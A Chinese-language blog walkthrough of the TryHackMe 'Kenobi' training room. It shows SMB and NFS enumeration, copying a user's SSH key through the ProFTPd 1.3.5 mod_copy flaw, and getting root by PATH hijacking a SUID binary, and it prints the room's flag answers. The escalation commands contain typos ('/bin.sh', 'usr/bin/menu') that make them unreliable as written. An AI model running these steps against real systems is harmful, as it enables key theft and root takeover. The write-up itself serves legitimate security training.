TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG!
Kenobi 「利用Samba+ProFtpd提权」
THM靶场:Kenobi
这个房间将介绍访问 Samba 共享,操纵易受攻击的 proftpd 版本以获取初始访问权限,并通过 SUID 二进制文件将您的权限升级为 root。虽然在THM里OSCP系列里属于入门级别难度的靶场,但是其中为共享枚举Samba、根据ProFtpd漏洞获取权限直至最后利用二进制配置错误来提升到最高权限在实操过程中有许多细节上的小麻烦,需要更加细致的处理,废话不多说,直接开干!!!
TASK1 部署机器
启动机器,连接openvpn,点击“Start Machine”获取目标IP,由于我的KALI物理机做了扩容,在挂载目录环节会产生错误,所以本次有的地方会用ATTACK BOX来进行演示,具体部署靶机过程如下:
命令:
export IP=10.10.xx.xx //将目标IP设置为靶机IP
ping $IP //测试IP是否可以ping通,检查配置是否正确
mkdir nmap //创建nmap文件,方便管理总结(在ATTACK BOX内不演示了)
nmap -T5 --max-retries 2500 -sC -sV -oN nmap/initial $IP //加快nmap扫描速度
使用cat initial获取扫描结果可以很容易看出,一共有七个端口开放,分别是:21、22、80、111、139、445、2049。
Q1:Scan the machine with nmap, how many ports are open?(使用namp扫描机器,有多少端口是开放的)
A1:7
TASK2 为共享枚举 Samba
什么是Samba?Samba 是适用于 Linux 和 Unix 的标准 Windows 互操作性程序套件。它允许最终用户访问和使用公司 Intranet 或 Internet 上的文件、打印机和其他常用共享资源。它通常被称为网络文件系统。Samba 基于服务器消息块 (SMB) 的通用客户端/服务器协议。SMB 仅针对 Windows 开发,没有 Samba,其他计算机平台将与 Windows 机器隔离,即使它们是同一网络的一部分。
命令:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse -oN nmap/smbscan $IP //使用nmap脚本枚举共享
smbclient //$IP/anonymous //使用攻击机连接到靶机的网络共享
mkdir samba;cd samba ;ls //创建目录,记得分开执行!!!
smbget -R smb://$IP/anonymous/ //也可以递归下载 SMB 共享
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
如下为命令拆解截图:
Q2:Using the nmap command above, how many shares have been found?(使用上面的 nmap 命令,找到了多少个共享?)
A2:3
Q3:Once you’re connected, list the files on the share. What is the file can you see?(连接后,列出共享上的文件。你能看到什么文件?)
A3:log.txt
Q4:What port is FTP running on?(FTP在哪个端口上运行?)
A4:21
之前的 nmap 端口扫描将显示端口 111 正在运行服务 rpcbind。这只是一个将远程过程调用(RPC)程序号转换为通用地址的服务器。当一个 RPC 服务启动时,它告诉 rpcbind 它正在监听的地址和它准备服务的 RPC 程序号。 在本例子中,端口 111 是对网络文件系统的访问。可以使用 nmap 来枚举。
Q5:What mount can we see?(我们能看到什么挂载内容)
A5:/var
TASK3 使用 ProFtpd 获得初始访问权限
获取 ProFtpd 的版本。使用 netcat 连接到机器上的 FTP 端口。
Q6:What is the version?(版本号是多少)
A6:1.3.5
使用 searchsploit 来查找特定软件版本的漏洞利用
Q7:How many exploits are there for the ProFTPd running?(ProFTPd 运行有多少漏洞?)
A7:4
使用命令:searchsploit -x linux/remote/36742.txt可以看出,由于mod_copy 模块实现SITE CPFR和SITE CPTO命令,可用于将文件/目录从服务器上的一个位置复制到另一个位置。任何未经身份验证的客户端都可以利用这些命令将文件从 文件系统的任何部分复制到选定的目标。我们知道FTP服务以 Kenobi 用户身份运行(来自共享上的文件),并且为该用户生成了一个 ssh 密钥。
命令如下:
nc $IP 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
接下来将 /var/tmp 目录挂载到我们的机器上
命令:
sudo mkdir /mnt/kenobiNFS //创建文件夹
sudo mount machine_ip:/var /mnt/kenobiNFS //挂载文件
ls -la /mnt/kenobiNFS //获取挂载的详细信息
直接去 /var/tmp 并获取私钥然后登录到 Kenobi 的账户
命令:
cp /mnt/kenobiNFS/tmp/id_rsa . //拷贝id_rsa到根目录
sudo chmod 600 id_rsa //赋予id_rsa文件可以读写的权限
__Q8:What is Kenobi’s user flag (/home/kenobi/user.txt)?(什么是 Kenobi 的用户标志 (/home/kenobi/user.txt))
__A8:d0b0f3f53b6caa532a83915e19224899
TASK4 使用路径变量操作提升权限
| 允许 | 关于文件 | 在目录 |
|---|---|---|
| SUID Bit | 用户以文件所有者的权限执行文件 | (无) |
| SGID Bit | 用户以组所有者的权限执行文件 | 在目录中创建的文件获得相同的组所有者 |
| Sticky Bit | 意义 | 禁止用户删除其他用户的文件 |
SUID Bit 可能很危险,某些二进制文件(例如 passwd)需要以提升的权限运行(因为它会在系统上重置您的密码),但是其他具有 SUID 位的自定义文件可能会导致各种问题。运行以下命令:find / -perm -u=s -type f 2>/dev/null,发现/usr/bin/menu看起来与常规不同。
Q9:What file looks particularly out of the ordinary? (什么文件看起来特别不寻常?)
A9:/usr/bin/menu
Q10:Run the binary, how many options appear?(运行二进制文件,出现多少个选项?)
A10:3
这向我们展示了二进制文件在没有完整路径的情况下运行(例如,不使用 /usr/bin/curl 或 /usr/bin/uname)。由于这个文件以 root 用户权限运行,我们可以操纵我们的路径获得一个 root shell。命令:
echo /bin.sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
usr/bin/menu
Q11:What is the root flag (/root/root.txt)?(什么是根标志 (/root/root.txt))
A11:177b3cd8562289f37382721c28381f02
Kenobi 靶场通关小结
就像星球大战中的欧比旺·克诺比是一个仁慈,智慧,坚韧而强大的正统而典型的绝地大师一样,这个看似简单的入门房间也有许许多多的复杂细节,比如通过靶机二进制配置错误来获取权限提升一样,对于初学者来说一定是相当的复杂。遇到难题和瓶颈也不必着急,可以多做几遍,慢慢沉下心来,我行,你也行~大家也可以关注我的公众号:HACKER 航仔 以获取最新消息并与我联系。我们下期再见,拜了个拜~~~
469
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
